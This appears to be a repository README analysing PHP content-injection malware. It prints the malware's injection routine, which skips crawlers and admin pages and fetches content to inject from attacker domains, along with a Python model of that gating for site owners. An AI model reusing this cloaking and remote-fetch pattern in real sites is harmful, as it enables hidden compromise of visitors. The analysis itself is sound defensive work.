Files in this repository:

  • step-by-step
  • final.php
  • injected-code-examples.md
  • original.php
  • readme.md

Reverse Engineering PHP Malware: Content Injection

This repository is the result of reverse engineering a piece of PHP malware that performs content injection on compromised sites.

The full description can be found in English at (@todo add link here) and in Portuguese at (@todo add link here).

Authors of this work (the reverse engineering, not the malware):

  • Bernardo Donadio bcdonadio at bcdonadio.com
  • Emerson Rocha Luiz emerson at alligo.com.br

Sample code

Excerpt of the injection routine, with the authors' notes (REVENGNOTE) inline. The helper functions check212, k34, cqq, en2 and gtd are called here but defined elsewhere in the malware; they are not part of this excerpt.

```php
/** REVENGNOTE: Do not assume that this malware will always use the same
 *              function names, not even across samples of the same malware.
 */
function day212()
{
	$a = check212("HTTP_USER_AGENT");
	$b = check212("HTTP_REFERER");
	$c = check212("REMOTE_ADDR");
	$d = check212("HTTP_HOST");
	$e = check212("PHP_SELF");

	/** REVENGNOTE: this array is never used here, but it was in the original
	 *              code. 33db9538.com, 9507c4e8.com, e5b57288.com and
	 *              54dfa1cb.com are domains that (at the time of writing)
	 *              point to the same working server; that server generates
	 *              the content injected into the victim's pages.
	 */
	$domarr = array(
		"33db9538",
		"9507c4e8",
		"e5b57288",
		"54dfa1cb"
	);

	/** REVENGNOTE: this is very important. The malware does NOT inject content
	 *              when the visitor looks like a search engine (which could
	 *              alert the site admin to the infection), nor on pages whose
	 *              path contains "admin" (administrative interfaces). The
	 *              HTTP_REFERER is not tested here but is forwarded to the
	 *              remote server, and the injection only shows up when a
	 *              referer is present: opening a shared link directly shows
	 *              nothing, you need to have navigated the site first.
	 *              Most antivirus/scanner agents will likely pass this local
	 *              check, but the remote server also receives the user agent
	 *              and can return empty content to them.
	 */
	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
		"google",
		"slurp",
		"msnbot",
		"ia_archiver",
		"yandex",
		"rambler"
	)) . "/i", strtolower($a)))) {
		// Search engine, admin page or incomplete request: inject nothing.
		$o1 = "";
	}
	else {
		// Random 6-digit nonce; also passed to k34() and en2() as a key.
		$op = mt_rand(100000, 999999);
		// Request path: nonce, then the five request fields obfuscated with
		// k34() and double URL-encoded.
		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
		// cqq() builds the remote host name and gtd() fetches the URL (both
		// defined elsewhere); "@" suppresses any fetch error.
		$url = "http://" . cqq(".com") . "/" . $g4;
		$ca1 = en2(@gtd($url) , $op);
		// The decoded response is split on "!NF0"; the second segment is the
		// content to inject. Anything else yields an empty string.
		$a1 = @explode("!NF0", $ca1);
		if (sizeof($a1) >= 2) $o1 = $a1[1];
		else $o1 = "";
	}

	return $o1;
}
```
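The gating logic and the "!NF0" response framing above, re-implemented in Python as an added example (not code from this repository or from the malware) and run over a few constructed request environments, so a site owner can see which visitors the malware stays silent for. Everything here is derived from the excerpt; the behaviour of check212() (returning "non" for a missing field) is an assumption inferred from the comparisons in the sample, and the visitor records and the response string are constructed for the demonstration.

```python
import re

# Search-engine user-agent fragments from the sample's preg_match() list.
BOT_MARKERS = ["google", "slurp", "msnbot", "ia_archiver", "yandex", "rambler"]
BOT_RE = re.compile("|".join(map(re.escape, BOT_MARKERS)), re.IGNORECASE)

# Delimiter the sample splits the remote server's response on.
DELIMITER = "!NF0"


def check(server, key):
    """Stand-in for the sample's check212() (not shown on the page). The
    sample compares its result to "non", so this ASSUMES it returns the
    request field, or "non" when the field is missing or empty."""
    value = server.get(key, "")
    return value if value else "non"


def should_inject(server):
    """Reproduce the if-condition of day212(): True means the malware would
    contact its remote server and inject the returned content, False means
    it stays silent for this visitor."""
    ua = check(server, "HTTP_USER_AGENT")
    addr = check(server, "REMOTE_ADDR")
    host = check(server, "HTTP_HOST")
    path = check(server, "PHP_SELF")
    if ua == "non" or addr == "non" or host == "non":
        return False  # incomplete request (CLI run, odd proxy, scanner)
    # strrpos(strtolower($e), "admin") is truthy for any position > 0;
    # PHP_SELF always starts with "/", so any "admin" in the path hides it.
    if "admin" in path.lower():
        return False
    if BOT_RE.search(ua):
        return False  # crawler: injecting could expose the infection
    # HTTP_REFERER is not tested locally, only forwarded to the remote server.
    return True


def extract_payload(response):
    """Mirror of explode("!NF0", $ca1)[1]: the injected content is the second
    segment; a response without the delimiter yields an empty string."""
    parts = response.split(DELIMITER)
    return parts[1] if len(parts) >= 2 else ""


# Constructed request environments (not real traffic), one per gate branch.
VISITORS = {
    "browser": {"HTTP_USER_AGENT": "Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0",
                "HTTP_REFERER": "http://example.test/index.php",
                "REMOTE_ADDR": "198.51.100.10", "HTTP_HOST": "example.test",
                "PHP_SELF": "/blog/post.php"},
    "googlebot": {"HTTP_USER_AGENT": "Mozilla/5.0 (compatible; Googlebot/2.1)",
                  "REMOTE_ADDR": "198.51.100.11", "HTTP_HOST": "example.test",
                  "PHP_SELF": "/blog/post.php"},
    "admin_page": {"HTTP_USER_AGENT": "Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0",
                   "REMOTE_ADDR": "198.51.100.12", "HTTP_HOST": "example.test",
                   "PHP_SELF": "/wp-admin/edit.php"},
    "no_host": {"HTTP_USER_AGENT": "curl/7.52.1", "REMOTE_ADDR": "198.51.100.13",
                "PHP_SELF": "/index.php"},
}


def classify(visitors=VISITORS):
    """Map each visitor name to whether day212() would inject for it."""
    return {name: should_inject(env) for name, env in visitors.items()}


if __name__ == "__main__":
    for name, injected in classify().items():
        print(f"{name:>10}: {'INJECT' if injected else 'silent'}")
    # Constructed response in the observed "!NF0" framing (not a real payload).
    print(repr(extract_payload("ok!NF0<script src=//x.test/a.js></script>!NF0end")))
```

Practical consequence for anyone checking a suspected site: a fetch with a crawler-like user agent, a missing Host/User-Agent header, or an "admin" path will show a clean page. To see the injection you have to request a normal public page with a browser user agent and a referer from the same site, which is exactly the visitor the malware is designed to serve.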

DISCLAIMER

This is a reverse engineering of malicious code found on compromised servers. Using this code without the explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use it except for educational purposes.